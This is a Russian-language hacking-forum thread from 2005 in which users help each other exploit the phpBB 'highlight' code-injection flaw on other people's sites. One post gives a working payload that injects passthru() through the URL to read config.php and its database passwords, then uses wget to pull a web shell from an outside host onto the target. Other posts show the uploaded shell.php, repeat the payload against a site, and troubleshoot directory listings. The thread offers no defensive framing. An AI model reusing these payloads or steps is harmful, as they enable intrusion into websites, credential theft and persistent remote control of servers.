HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 03.07.2005, 15:51
Dragunov
Новичок
Регистрация: 03.07.2005
Сообщений: 5
Провел на форуме:
0

Репутация: 0
По умолчанию

Можешь дать номер своей аськи?
 
Ответить с цитированием

  #42  
Старый 03.07.2005, 16:01
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Нет
Пиши в ПМ, если что-то беспокоит..
 
Ответить с цитированием

  #43  
Старый 04.07.2005, 23:19
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Такое дело. Шелл вроде я залил,
Код:
rw-r--r--    1 u3603347 ftpusers    43265 Jun 30 17:38 search.php
rw-r--r--    1 u3603347 ftpusers        0 Jul  4 14:32 shell.php
rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.1
rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.2
rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.3
rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.4
rw-r--r--    1 u3603347 ftpusers     2958 Jul  4 14:32 shell.php.5
rwxr-xr-x    6 u3603347 ftpusers     4096 Jun 30 17:38 templates
rw-r--r--    1 u3603347 ftpusers        5 Jul  4 01:26 test.txt
rw-r--r--    1 u3603347 ftpusers      691 Nov 21  2004 update.php
rw-r--r--    1 u3603347 ftpusers    23154 Oct 19  2004 viewforum.php
rw-r--r--    1 u3603347 ftpusers     7233 May  9 19:42 viewonline.php
rw-r--r--    1 u3603347 ftpusers    45228 May  9 19:42 viewtopic.php
Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
__________________
Full DNS report
 
Ответить с цитированием

  #44  
Старый 06.07.2005, 03:03
Felix
Новичок
Регистрация: 10.06.2005
Сообщений: 2
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Rebz  
Dragunov, максимум что ты получишь - пароли от БД. =))

их получаешь из следующей команды:
viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_G ET_VARS[cmd]).'

Запустил? Ничего не появилось?) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
<?php
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = '*********';
$dbuser = '*******';
$dbpasswd = '*****';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);
?>

Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.

для заливки шелла юзаем команду wget. Синаксис:
wget http://shell.narod.ru/shell.php
Пишем это дело в cmd в урле.

Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
cmd=ls -la;wget http:// ....
вот приблизительно так должно получиться)).
Переходить в др. директории командой cd.

зы: можно писать несколько команд через точку с запятой.
Привет, у меня немного по-другому исчезает само сообщение на странице т.е там где текст ничего нету, но в сорсе кода тоже ничего не отображает, в чем может быть дело ?
 
Ответить с цитированием

  #45  
Старый 06.07.2005, 03:09
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Azazel, а ты права доступа взглянул??) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..

Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!
 
Ответить с цитированием

  #46  
Старый 07.07.2005, 21:45
Felix
Новичок
Регистрация: 10.06.2005
Сообщений: 2
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Rebz  
Azazel, а ты права доступа взглянул??) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..

Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!

Походу уязвим т.к когда я начинаю задавать какие либо параметры, от форума остается только шапка, но ничего не выполняется и следовательно не выводиться тоже как быть, мот кто встречал ??
 
Ответить с цитированием

  #47  
Старый 07.07.2005, 22:06
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию

Я вот пишу: _http://saitik/forum/viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET _VARS[cmd]).%27&cmd=ls ../../;ls%20-la Он не показывает права на папки, что не так? Да и где-то читал, что нада посмореть качалку, которая стоит на сайте, как и где это зделать?
 
Ответить с цитированием

  #48  
Старый 07.07.2005, 22:30
nopmoc
Новичок
Регистрация: 06.05.2005
Сообщений: 11
Провел на форуме:
7371

Репутация: 0
По умолчанию

надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
 
Ответить с цитированием

  #49  
Старый 07.07.2005, 23:40
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

>>Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
=))))))))) лооооол это веб шел...набивай адрес в урл
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #50  
Старый 08.07.2005, 00:09
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию

Цитата:
Сообщение от nopmoc  
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
А не прокатывает =( Выдает вот так:
../../:
cgi-bin
cgi-bin-dist
data
data-dist
error
error-dist
icons
icons-dist
И всё... ну что ещё мона зделать...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Сценарии/CMF/СMS 11 01.02.2007 12:21
Использование уязвимости в phpbb 2.0.15. Вопросы.. -artik- Сценарии/CMF/СMS 8 28.08.2005 20:00
phpBB < 2.0.15, BBCODE URL в phpBB karapuz Сценарии/CMF/СMS 21 17.06.2005 06:11
Вопрос про статью на античате о Уязвимости форумов IPB aX0en Сценарии/CMF/СMS 2 16.12.2004 20:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ